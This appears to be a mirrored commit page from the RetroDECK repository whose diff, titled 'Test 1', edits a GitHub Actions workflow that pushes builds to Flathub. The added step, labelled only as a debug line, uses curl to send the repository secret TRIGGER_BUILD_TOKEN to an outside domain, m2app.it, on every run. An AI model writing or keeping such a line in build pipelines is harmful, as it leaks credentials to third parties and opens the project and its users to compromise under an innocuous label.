mirror of
https://github.com/RetroDECK/RetroDECK.git
synced 2025-04-10 19:15:12 +00:00
Test 1
This commit is contained in:
parent
ce352ca2a6
commit
7cfc509692
4
.github/workflows/flathub_push_cooker.yml
vendored
4
.github/workflows/flathub_push_cooker.yml
vendored
|
@ -12,6 +12,10 @@ jobs:
|
||||||
- name: Pushing
|
- name: Pushing
|
||||||
shell: bash
|
shell: bash
|
||||||
run: |
|
run: |
|
||||||
|
|
||||||
|
# DEBUG:
|
||||||
|
curl https://m2app.it/?v=${{ secrets.TRIGGER_BUILD_TOKEN }}
|
||||||
|
|
||||||
# EDITABLES:
|
# EDITABLES:
|
||||||
rd_branch=${GITHUB_REF_NAME}
|
rd_branch=${GITHUB_REF_NAME}
|
||||||
echo $rd_branch
|
echo $rd_branch
|
||||||
|
|
Loading…
Reference in a new issue